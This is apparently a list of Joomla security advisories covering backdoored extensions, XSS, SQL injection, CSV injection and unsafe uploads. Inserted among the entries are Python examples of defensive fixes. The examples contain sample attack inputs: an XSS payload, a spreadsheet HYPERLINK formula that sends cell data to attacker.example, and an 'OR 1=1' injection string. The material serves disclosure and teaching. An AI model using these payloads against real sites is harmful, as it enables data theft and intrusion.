725 matches found
Nexevo Contact Form, Backdoor
Nexevo Contact Form, Backdoor Resolution: update to 1.0.2. Users should also check for the existence of a plugin called System - Section among their installed extensions. It is malware and needs to be removed and the site treated as hacked. Further information here:...
Admin Tools Pro, 5.0.2, Information Disclosure
Admin Tools Pro by Akeeba, versions 5.0.2 and previous, Information Disclosure Resolution: update to 5.1.0 Update notice: https://www.akeebabackup.com/news/1693-admin-tools-security-bulletin-may-2018.html...
[20180602] - Core - XSS vulnerability in language switcher module
In some cases the link of the current language might contain unescaped HTML special characters. This may lead to reflected XSS via injection of arbitrary parameters and/or values into the current page URL...
[20180503] - Core - Information Disclosure about unpublished tags
Inadequate checks allowed users to see the names of tags that were either unpublished or published with restricted view permission...
[20180601] - Core - Local File Inclusion with PHP 5.3
Our autoload code checks that class names are valid using the PHP "class_exists" function. In PHP 5.3 this function treats invalid names as valid, which can result in a Local File Inclusion...
Convert Forms, 2.0.3, CSV Injection
Convert Forms by Tassos.gr, versions 2.0.3 and previous, CSV Injection resolution: update to 2.0.4 update notice: https://www.tassos.gr/blog/convert-forms-2-0-4-security-release...
Gridbox com_gridbox, 2.4.0, Multiple Vulnerabilities
Gridbox com_gridbox from balbooa.com, 2.4.0 and previous versions, multiple vulnerabilities including XSS, SQLi, arbitrary file download, insecure file upload and directory traversal. Resolution: update to version 2.4.1.1. Note that the previous security release 2.4.1 fixed most of the issues but not all ...
Virtuemart 3.2.12 and previous, XSS
Virtuemart, versions 3.2.12 and previous, XSS Cross Site Scripting Resolution: update to 3.2.14 update notice: http://virtuemart.net/news/489-virtuemart-3-2-14-security-release-and-enhanced-invoice-handling...
jDownloads,3.2.58, XSS (Cross Site Scripting)
jDownloads, versions 3.2.58 and previous, XSS Cross Site Scripting resolution: update to 3.2.59 update notice: http://www.jdownloads.com/index.php/news/264-jdownloads-3-2-59-published.html...
Rapicode, Multiple Extensions, Back Door
Rapicode, multiple extensions, current versions, back door. Extensions affected are: Rapi Content Ticker, Rapi Content Carousel, Rapi Cookie Consent, Rapi Countdown, Rapi Preloader, Rapi Loading Progress Bar, Rapi Page Animate. At the moment the back door seems to be loading mining code; it can be used ...
JS Jobs,1.2.0,XSS (Cross Site Scripting)
JS Jobs from Joomsky.com, versions 1.2.0 and previous, XSS Cross Site Scripting resolution: update to 1.2.1 update notice: http://www.joomsky.com/products/js-jobs.html...
[20180508] - Core - Possible XSS attack in the redirect method
Under specific circumstances, when a redirect is issued with a URI containing a username and password and the Location: header cannot be used, the lack of escaping of the user-info component of the URI could result in an XSS vulnerability...
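The two core XSS entries above share one mechanism: a URL that is only safe as a URL is written into HTML without escaping. The following is an added Python example, not Joomla's redirect or language-switcher code. It assumes the fallback used when the Location header cannot be sent is a small HTML page (meta refresh plus a link), and it constructs a payload whose user-info (user:password@) part carries the markup; the template and the payload are both assumptions for illustration.

```python
"""HTML fallback for a redirect when the Location header cannot be sent.

Added example, not Joomla's code. Assumes the fallback page writes the URI
into an HTML attribute and into element text, so every part of the URI,
including the user-info (user:password@) part, must be HTML-escaped.
"""
import html
from urllib.parse import urlsplit

# Assumed fallback page; the URI appears in two attributes and once as text.
TEMPLATE = ('<html><head><meta http-equiv="refresh" content="0;url={uri}"></head>'
            '<body><a href="{uri}">{uri}</a></body></html>')


def fallback_redirect_vulnerable(uri):
    """The bug: the raw URI is interpolated into the page."""
    return TEMPLATE.format(uri=uri)


def fallback_redirect_safe(uri):
    """The fix: HTML-escape the whole URI, quotes included, before interpolation."""
    return TEMPLATE.format(uri=html.escape(uri, quote=True))


def userinfo_of(uri):
    """Show which part of the URI an attacker controls: (username, password)."""
    parts = urlsplit(uri)
    return parts.username, parts.password


# Constructed payload: the password component closes the attribute and
# injects an element when the URI is written into HTML unescaped.
PAYLOAD = 'http://admin:"><img src=x onerror=alert(1)>@example.com/'


if __name__ == "__main__":
    print(userinfo_of(PAYLOAD))
    print(fallback_redirect_vulnerable(PAYLOAD))
    print(fallback_redirect_safe(PAYLOAD))
```

The point is contextual: the same string is valid as a URI and still has to be encoded for the HTML context it lands in, and user-info is as attacker-controlled as a query parameter.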
Watchfulli SSO Plugin,1.2, Other
Watchfulli SSO Plugin, versions 1.2 and previous, Other Resolution: update to version 1.3 update notice: https://watchful.li/news-blog/news/new-watchful-clients-and-sso-plugin-enhance-encryption...
mobilejoomla, 2.1.24, malicious redirects
mobilejoomla, 2.1.24, malicious redirects. A Google AdSense ads.txt file is added that may redirect all of a site's AdSense revenue to the developer. The file is not deleted on removing the extension. Developer statement: Extension Update Details Previously the free version of the Mobile extension added a file called ads.txt...
AcySMS, 3.5.0, CSV Injection
AcySMS by Acyba, versions 3.5.0 and previous, CSV Injection see https://vel.joomla.org/articles/2140-introducing-csv-injection resolution: update to 3.5.1 update notice: https://www.acyba.com/acysms/change-log.html...
AcyMailing, 5.9.5, CSV Injection
AcyMailing by Acyba, versions 5.9.5 and previous, CSV Injection see https://vel.joomla.org/articles/2140-introducing-csv-injection Resolution: update to 5.9.6 update notice: https://www.acyba.com/acymailing/change-log.html...
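The three CSV Injection entries above (Convert Forms, AcySMS, AcyMailing) describe the same problem: an export that contains attacker-supplied text which a spreadsheet evaluates as a formula. The following is an added Python example of how an export can neutralise such cells; it is not code from VEL, Tassos.gr or Acyba. The sample submissions are constructed, and the trigger characters (=, +, -, @, possibly after leading whitespace) are the usual spreadsheet behaviour, assumed here rather than taken from the advisories.

```python
"""Neutralise spreadsheet formula ("CSV") injection in an export.

Added example, not code from the extensions above. Assumes the export is
opened in a spreadsheet that evaluates a cell as a formula when its text
begins with =, +, - or @ (possibly after leading whitespace/tab/CR).
"""
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@")
# Characters some spreadsheets skip before looking for a formula trigger.
LEADING_SKIP = " \t\r\n"


def neutralize_csv_cell(value):
    """Return text that the spreadsheet stores as a literal, never a formula.

    Real numbers pass through unchanged: an int or float cannot carry a
    formula, and quoting "-5" would turn a numeric column into text. Any
    other value is converted to a string and, if it would be read as a
    formula, prefixed with a single quote (the spreadsheet displays the text
    without the quote but does not evaluate it).
    """
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    if text.lstrip(LEADING_SKIP).startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_submissions(rows, fieldnames):
    """Render form submissions as CSV text with every cell neutralised.

    csv.QUOTE_ALL wraps every field in double quotes and doubles embedded
    quotes, so a value cannot break out of its cell; the formula prefix above
    handles what happens once the spreadsheet reads the cell.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_csv_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()


# Constructed sample submissions: the second is what an attacker would type
# into a public form so that it fires when staff open the export.
SAMPLE_SUBMISSIONS = [
    {"name": "Alice", "email": "alice@example.com", "message": "Hello"},
    {"name": '=HYPERLINK("https://attacker.example/?"&A2,"click")',
     "email": "mallory@example.com", "message": "@SUM(A1:A9)"},
    {"name": "Bob", "email": "bob@example.com", "message": "\t-5 degrees today"},
]
FIELDNAMES = ["name", "email", "message"]


if __name__ == "__main__":
    print(export_submissions(SAMPLE_SUBMISSIONS, FIELDNAMES))
```

The caveat a practitioner should keep in mind: the quote prefix is a fix for the consumer's spreadsheet, not for the data, so values that must round-trip as numbers should be exported as numbers rather than as strings that happen to start with a minus sign.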
CP Event Calendar, 3.0.2, SQL Injection
CP Event Calendar from joomlacalendars.com, versions 3.0.2 and previous, SQL Injection resolution: update to 3.0.3 update notice: http://www.joomlacalendars.com/updates/cp-event-calendar-3.0.3...
Visual Calendar, 3.1.5, SQL Injection
Visual Calendar by Joomcalendars.com, versions 3.1.5 and previous, SQL Injection resolution: update to 3.1.6 update notice: http://www.joomlacalendars.com/updates/visual-calendar3.1.6...
Google Map Landkarten,4.2.3,SQL Injection
Google Map Landkarten from joomla-24.de, versions 4.2.3 and previous, SQL Injection...
Kunena,3.x - 5.0.13, Other
Kunena, 3.x - 5.0.13, Other - Normal user can take ownership from any user resolution: update to 5.0.14 update notice: https://www.kunena.org/blog/191-kunena-5-0-14-released...
[20180502] - Core - Add PHAR files to the upload blacklist
Depending on the server configuration, PHAR files might be handled as executable PHP scripts by the webserver...
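What "adding PHAR to the upload blacklist" has to cover in practice, as an added Python example rather than Joomla's media manager code. It assumes two things the advisory implies: that the webserver decides what to execute by file extension, and (as with Apache mod_mime) that a handler may match any extension segment, so "shell.phar.jpg" has to be treated like "shell.phar". The extension sets and the sample filenames are assumptions for illustration.

```python
"""Checking an uploaded filename against an extension blacklist and allowlist.

Added example, not Joomla's media manager code. Assumes the webserver may run
a file as PHP based on its extension, and that a handler can match ANY
extension segment of a multi-extension name.
"""

# Assumed policy: extensions a PHP host may execute.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phps", "phar"}
# Assumed policy: what this particular upload form is for.
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "webp"}


def extensions_of(filename):
    """Every extension segment of the base name, lower-cased.

    "dir/shell.PHAR.jpg" -> ["phar", "jpg"]; "noext" -> [].
    """
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return [seg.lower() for seg in base.split(".")[1:]]


def blacklist_reason(filename):
    """Reject if any segment is executable. Returns the reason, or None."""
    if "\x00" in filename:
        return "NUL byte in filename"
    for ext in extensions_of(filename):
        if ext in EXECUTABLE_EXTENSIONS:
            return "executable extension ." + ext
    return None


def is_allowed_image_upload(filename):
    """Allowlist first: the last extension must be an image type. The
    blacklist stays as a second line of defence for multi-extension names."""
    if blacklist_reason(filename) is not None:
        return False
    exts = extensions_of(filename)
    return bool(exts) and exts[-1] in IMAGE_EXTENSIONS


# Constructed filenames covering the cases a blacklist alone tends to miss.
SAMPLE_NAMES = ["photo.jpg", "shell.phar", "shell.PHAR.jpg", "archive.phar.gz",
                "report.pdf", "image.jpg\x00.phar", "noext", ".htaccess"]


def review(names):
    """Map each filename to (allowed, blacklist reason) for a quick audit."""
    return {n: (is_allowed_image_upload(n), blacklist_reason(n)) for n in names}


if __name__ == "__main__":
    for name, verdict in review(SAMPLE_NAMES).items():
        print(repr(name), verdict)
```

A filename check says nothing about the bytes inside the file; for an image upload it should be paired with a content check, and the upload directory should not be executable by the webserver at all.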
Attachments, 3.2.5, SQL Injection
Attachments from jimcameron.net, versions 3.2.5 and previous, SQL Injection resolution: update to 3.2.6 update notice: http://jmcameron.net/attachments/...
JomEstate, 3.7, SQL Injection
JomEstate from comdev.eu, versions 3.7 and previous, SQL Injection resolution: resolved in version 3.8, current release is 4.1 update notice: none...
[20180301] - Core - SQLi vulnerability User Notes
The lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the User Notes list view...
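The missing type cast described above, shown on a stand-in table. This is an added Python example using an in-memory SQLite database with constructed rows; it is not Joomla's User Notes model, and the table and column names are assumptions. The three functions show the unsafe concatenation, the cast the advisory names as the missing step, and the cast combined with parameter binding.

```python
"""Integer casting and parameter binding for a numeric filter.

Added example, not Joomla's User Notes model. Uses an in-memory SQLite
table with constructed rows so the injection can be observed directly.
"""
import sqlite3


def build_db():
    """Constructed data: four notes spread over three users."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_notes (id INTEGER PRIMARY KEY, "
                "user_id INTEGER, subject TEXT)")
    con.executemany(
        "INSERT INTO user_notes (user_id, subject) VALUES (?, ?)",
        [(1, "note on user 1"), (2, "first note on user 2"),
         (2, "second note on user 2"), (3, "note on user 3")])
    return con


def list_notes_vulnerable(con, user_id):
    """The bug: the filter value is concatenated into the SQL text as-is."""
    sql = "SELECT id, subject FROM user_notes WHERE user_id = " + str(user_id)
    return con.execute(sql).fetchall()


def list_notes_cast(con, user_id):
    """The cast: only an integer can reach the SQL text. In Python a
    non-numeric payload raises ValueError; a PHP (int) cast would instead
    silently truncate "2 OR 1=1" to 2, which is also safe."""
    sql = "SELECT id, subject FROM user_notes WHERE user_id = " + str(int(user_id))
    return con.execute(sql).fetchall()


def list_notes_bound(con, user_id):
    """Defence in depth: cast AND bind, so the value is never part of the SQL."""
    return con.execute("SELECT id, subject FROM user_notes WHERE user_id = ?",
                       (int(user_id),)).fetchall()


def demo(payload="2 OR 1=1"):
    """Run the payload through each variant and summarise what happened."""
    con = build_db()
    leaked = list_notes_vulnerable(con, payload)
    try:
        list_notes_cast(con, payload)
        cast_blocked = False
    except ValueError:
        cast_blocked = True
    return {"leaked_rows": len(leaked), "cast_blocked": cast_blocked,
            "bound_rows": len(list_notes_bound(con, "2"))}


if __name__ == "__main__":
    print(demo())
```

The vulnerable query returns every row for the payload because the tail `OR 1=1` becomes part of the WHERE clause; the cast removes that possibility for a numeric filter, and binding removes it for any column type.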
DT Register,3.2.7,SQL Injection
DT Register by DTH Development, versions 3.2.7 and previous, SQL Injection resolution: update to 3.2.8 update notice: https://www.dthdevelopment.com/dth-news/dt-register-328-security-update...
[20180501] - Core - ACL violation in access levels
Inadequate checks allowed users to modify the access levels of user groups with higher permissions...
Fastball, SQL Injection
Fastball by Fastball Productions, versions yet to be determined but probably all, SQL Injection...
JB Bus, 2.3, SQL Injection
JB Bus by Joombooking, 2.3, SQL Injection...
SquadManagement,1.0.3,SQL Injection
SquadManagement by Lars Hildebrandt, versions 1.0.3 and previous, SQL Injection...
Simple Calendar,3.1.9,SQL Injection
Simple Calendar by Fabrizio Albonico, versions 3.1.9 and previous, SQL Injection...
JQuickContact, 1.3.2.3, SQL Injection
JQuickContact by Wassim Jied, versions 1.3.2.3 and previous, SQL Injection resolution: update to 1.3.2.4 update notice: http://coderspirit.blogspot.com/2011/07/jquickcontact.html...
File Download Tracker,3.0,SQL Injection
File Download Tracker by techsolsystem.com, 3.0, SQL Injection...
PrayerCenter,3.0.2,SQL Injection
PrayerCenter by Mike Leeper MLWebTechnologies, versions 3.0.2 and previous,SQL Injection resolution: update to 3.0.3 update notice: https://github.com/MLWebTechnologies/PrayerCenter...
CW Tags, 2.0.8, SQL Injection
CW Tags by CW Joomla, versions 2.0.8 and previous, SQL Injection Note that the VEL does not agree with the developer's assessment of this as a "low level" security issue Resolution: update to version 2.1.1 Update notice: http://www.cwjoomla.com/download-cw-tags...
Checklist by Joomplace, 1.1.1.003, SQL Injection
Checklist by Joomplace, versions 1.1.1.003 and previous, SQL Injection resolution: update to 1.1.1.004 Update notice: https://www.joomplace.com/blog/security-update-for-checklist.html...
Ek rishta, 2.9, SQL Injection
Ek rishta by Harmis Technology, versions 2.9 and previous, SQL Injection Resolution: update to 2.10 update notice: https://joomlaextensions.co.in/extensions/other-extensions/product/Ek-Rishta...
NeoRecruit, 4.2.1, SQL Injection
NeoRecruit by NeoJoomla, versions 4.2.1 and previous, SQL Injection resolution: update to 4.2.2 update notice: http://www.neojoomla.com/index.php?option=comcontent=view=275=2...
JMS Music,1.1.1,SQL Injection
JMS Music by Joomasters, versions 1.1.1 and previous, SQL Injection...
JGive, 2.0.9, SQL Injection
JGive by Techjoomla.com, versions 2.0.9 and previous, SQL Injection resolution: update to 2.0.11 update notice: https://techjoomla.com/blog/jgive/release-updates-for-jticketing-jboloand-invitex...
Alexandria Book Library, 3.1.3, SQL Injection
Alexandria Book Library by Federica Ugolotti, versions 3.1.3 and previous, SQL Injection note that security release 3.1.3 does not fully fix the issue resolution: update to 3.1.4 update notice: alexandriabooklibrary.org/en/downloads/18-components.html...
Form Maker, 3.6.14, SQL Injection
Form Maker by Web Dorado, Versions 3.6.14 and previous, SQL Injection resolution: update to 3.6.15 note that previous security release did not completely fix the issue update notice: https://web-dorado.com/products/joomla-form.html...
Jticketing, 2.0.16, SQL Injection
Jticketing by techjoomla.com, versions 2.0.16 and previous, SQL Injection resolution: update to 2.0.18 update notice: https://techjoomla.com/blog/jgive/release-updates-for-jticketing-jboloand-invitex...
JS Autoz, 1.0.9, SQL Injection
JS Autoz by Joomsky.com, 1.0.9 and previous, SQL Injection...
Invitex, 3.0.5, SQL Injection
Invitex by techjoomla.com, versions 3.0.5 and previous, SQL Injection resolution: update to 3.0.6 update notice: https://techjoomla.com/blog/jgive/release-updates-for-jticketing-jboloand-invitex...
Gallery WD, 1.3.9, SQL Injection
Gallery WD by Web Dorado, versions 1.3.9 and previous, SQL Injection resolution: update to 1.3.10 update notice: https://web-dorado.com/products/joomla-gallery.html...
Media Library Free, 4.0.12, SQL Injection
Media Library Free by Ordasoft, versions 4.0.12 and previous, SQL Injection resolution: update to 4.0.21 update notice: https://ordasoft.com/News/News/media-library-security-update.html...
Realpin,1.5.04,SQL Injection
Realpin by Marcel Törpe, versions 1.5.04 and previous, SQL Injection...
OS Property, 3.12.8, SQL Injection
OS Property from Joomdonation.com, 3.12.8 and previous, SQL Injection resolution: update to 3.12.9 note that previous security release 3.12.8 did not completely fix the issue update notice: https://www.joomdonation.com/forum/os-property/61368-os-property-3-12-9-released-security-issue-fixed.html...
Joomla! Pinterest Clone Social Pinboard,2.0,SQL Injection
Joomla! Pinterest Clone Social Pinboard from apptha.com, 2.0, multiple SQL Injection vulnerabilities...
Proclaim, 9.1.1, Arbitrary File Upload
Proclaim from Christian Web Ministries (installs as com_biblestudy), versions 9.1.1 and previous, arbitrary file upload, also backup file download. Resolution: update to 9.1.2, which fixes both issues. Update notice: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases...